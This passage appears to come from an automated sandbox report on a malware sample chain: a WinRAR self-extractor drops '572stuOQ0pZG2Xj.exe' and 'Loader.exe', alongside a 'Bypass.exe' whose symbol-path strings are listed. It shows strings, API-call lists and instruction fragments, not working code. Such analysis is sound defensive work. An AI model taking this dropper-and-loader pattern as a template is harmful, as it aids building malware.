                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005043000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: }C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005043000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005474000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: eC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005043000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: krnlmp.pdb\*\* source: Bypass.exe, 0000000F.00000002.4223150411.000000001BBCF000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005043000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.000000000490D000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: gC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005043000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005043000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: kC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005043000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: lC:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000004DBE000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: xC:\Users\user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005043000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005474000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005043000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: nC:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000004DBE000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: wC:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005043000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: hC:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000004DBE000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005474000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: yC:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005043000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: |C:\Users\user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005474000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: bFZYRLnRIz.exe, 572stuOQ0pZG2Xj.exe.0.dr
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: fC:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000004DBE000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: vC:\Users\user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: mC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF71613B190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF71613B190
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF7161240BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7161240BC
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF71614FCA0 FindFirstFileExA,0_2_00007FF71614FCA0
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D3340BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,11_2_00007FF64D3340BC
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D34B190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,11_2_00007FF64D34B190
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D35FCA0 FindFirstFileExA,11_2_00007FF64D35FCA0
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 12_2_009DF406 FindFirstFileExW,FindNextFileW,FindClose,FindClose,12_2_009DF406
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then jmp ecx12_2_00A141B1
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]12_2_00A0A1C5
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then mov eax, dword ptr [00440144h]12_2_00A08159
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]12_2_00A1E236
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then jmp eax12_2_00A2E3EB
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then movzx ebx, word ptr [edx]12_2_00A16364
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]12_2_00A1C6DC
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then mov eax, dword ptr [esi+000007F0h]12_2_00A1C6DC
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]12_2_00A1C6DF
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then mov eax, dword ptr [esi+000007F0h]12_2_00A1C6DF
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then jmp ecx12_2_00A2E60E
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then jmp ecx12_2_00A2A7DA
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [edx]12_2_00A26708
